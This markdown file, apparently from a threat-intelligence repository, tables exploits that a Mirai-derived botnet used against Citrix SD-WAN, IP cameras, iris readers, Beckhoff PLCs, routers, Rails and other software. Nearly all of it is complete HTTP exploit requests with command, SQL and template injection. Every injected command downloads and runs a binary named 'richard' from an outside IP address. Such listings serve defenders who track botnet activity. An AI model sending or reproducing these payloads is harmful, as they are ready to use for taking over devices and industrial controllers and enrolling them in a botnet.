APT_REPORT/Exploit/EXP-LIST.md


For more details please contact [@blackorbird](https://twitter.com/blackorbird)
2019-12-18 17:45:35 +08:00
Thanks to [pan-unit42](https://github.com/pan-unit42)
|*Vulnerability* | *Affected Devices* | *Exploit Format*|
|---|---|---|
|[CVE-2019-12989, CVE-2019-12991](https://www.exploit-db.com/exploits/47112)|Citrix SD-WAN Appliances (tested on 10.2.2)|```POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % '99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```<br>```'SSL_CLIENT_VERIFY' : 'SUCCESS'```<br>```get_package_fil:```<br>```site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active```<br><br>```User-Agent: Hello-World```<br>```Connection: keep-alive```|
|[EyeLock nano NXT Remote Code Execution](https://www.exploit-db.com/exploits/40228)| EyeLock NXT Biometric Iris Readers with firmware version 3.5|```GET /scripts/rpc.php?action=updatetime&timeserver=\|\|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```|
|[Iris ID IrisAccess ICU Cross-Site Scripting](https://www.exploit-db.com/exploits/40166)|Iris ID IrisAccess ICU 7000-2|```POST /html/SetSmarcardSettings.php HTTP/1.1```<br>```Content-Length: 11660```<br>```Content-Type: application/x-www-form-urlencoded```<br>```Connection: close```<br>```X-Powered-By: PHP/5.5.13```<br>```User-Agent: joxypoxy/7.2.6```<br><br>```HidChannelID=2&HidcmbBook=0&cmbBook=0\|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08```|
|[CVE-2015-4051](https://www.exploit-db.com/exploits/38514)|Beckhoff CX9020 PLCs|```POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1```<br>```User-Agent: Hello-World```<br>```Host: 192.168.0.1:5120```<br>```Content-type: text/xml; charset=utf-8```<br>```SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write```<br>```M-SEARCH * HTTP/1.1```<br>```HOST: 239.255.255.250:1900```<br>```MAN: ssdp:discover',0Dh,0Ah```<br>```MX: 3```<br>```ST: upnp:rootdevice```<br><br>```<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>```|
|[Xfinity Gateway Remote Code Execution](https://www.exploit-db.com/exploits/40856)|Xfinity Gateways|```POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1```<br>```Host: 10.0.0.1:80```<br>```User-Agent: ```<br>```Accept: application/json, text/javascript, */*; q=0.01```<br>```Accept-Language: en-US,en;q=0.5```<br>```Accept-Encoding: gzip, deflate```<br>```Content-Type: application/x-www-form-urlencoded; charset=UTF-8```<br>```X-Requested-With: XMLHttpRequest```<br>```Referer: http://10.0.0.1/network_diagnostic_tools.php```<br>```Content-Length: 91```<br>```Cookie: PHPSESSID=; auth=```<br>```DNT: 1```<br>```X-Forwarded-For: 8.8.8.8```<br>```Connection: keep-alive```<br><br>```test_connectivity=true&destination_address=www.comcast.net \|\| cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4```|
|[Beward N100 Authenticated Remote Code Execution](https://www.exploit-db.com/exploits/46319)|Beward N100 IP Cameras|```GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.2.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```<br>```Authorization: Basic YWRtaW46YWRtaW4=```<br>```Server: Boa/0.94.14rc21```<br>```Accept-Ranges: bytes```<br>```Connection: close```<br>```Content-type: text/plain```|
|[Fritz!Box Webcm Command Injection](https://www.exploit-db.com/exploits/32753) - this vulnerability was first briefly seen exploited by the Muhstik botnet in January 2018. This is the first instance of exploitation by a Mirai descendant.|Several versions of Fritz!Box devices|```GET /cgi-bin/webcm HTTP/1.1```<br><br>```var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard```|
|[FLIR Thermal Camera Command Injection](https://www.exploit-db.com/exploits/42788)| Certain FC-Series S and PT-Series models of FLIR Cameras|```POST /page/maintenance/lanSettings/dns HTTP/1.1```<br>```Host: 192.168.0.1:80```<br>```Content-Length: 64```<br>```Accept: */*```<br>```Origin: http://192.168.0.1```<br>```X-Requested-With: XMLHttpRequest```<br>```User-Agent: Testingus/1.0```<br>```Content-Type: application/x-www-form-urlencoded```<br>```Referer: http://192.168.0.1/maintenance```<br>```Accept-Language: en-US,en;q=0.8,mk;q=0.6```<br>```Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b```<br>```Connection: close```<br><br>```dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60```|
|[Sapido RB-1732 Remote Command Execution](https://www.exploit-db.com/exploits/47031)|Sapido RB-1732 Wireless Routers | ```GET /goform/formSysCmd HTTP/1.1```<br>```('<textarea rows="15" name="msg" cols="80" wrap="virtual">')```<br>```('</textarea>')```<br><br>```{'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}```|
|[CVE-2016-0752](https://www.exploit-db.com/exploits/40561)|Ruby on Rails multiple versions|```POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1```<br>```Content-Type: multipart/form-data; boundary=```<br>```<%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>```|
|[CVE-2014-3914](https://www.exploit-db.com/exploits/33807)|Rocket ServerGraph 1.2 (tested on Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu 12.04 64 bits)|```POST /SGPAdmin/fileRequest HTTP/1.1```<br>```&invoker=&title=&params=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=```|
|[CVE-2015-2208](https://www.exploit-db.com/exploits/36251)|PHPMoAdmin installations|```POST /moadmin/moadmin.php HTTP/1.1```<br>```Host: 192.168.0.1:80```<br>```User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0```<br>```Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8```<br>```Accept-Language: en-US,en;q=0.5```<br>```Accept-Encoding: gzip, deflate```<br>```DNT: 1```<br>```Connection: keep-alive```<br>```Pragma: no-cache```<br>```Cache-Control: no-cache```<br>```Content-Type: application/x-www-form-urlencoded```<br>```Content-Length: 34```<br><br>```object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit```|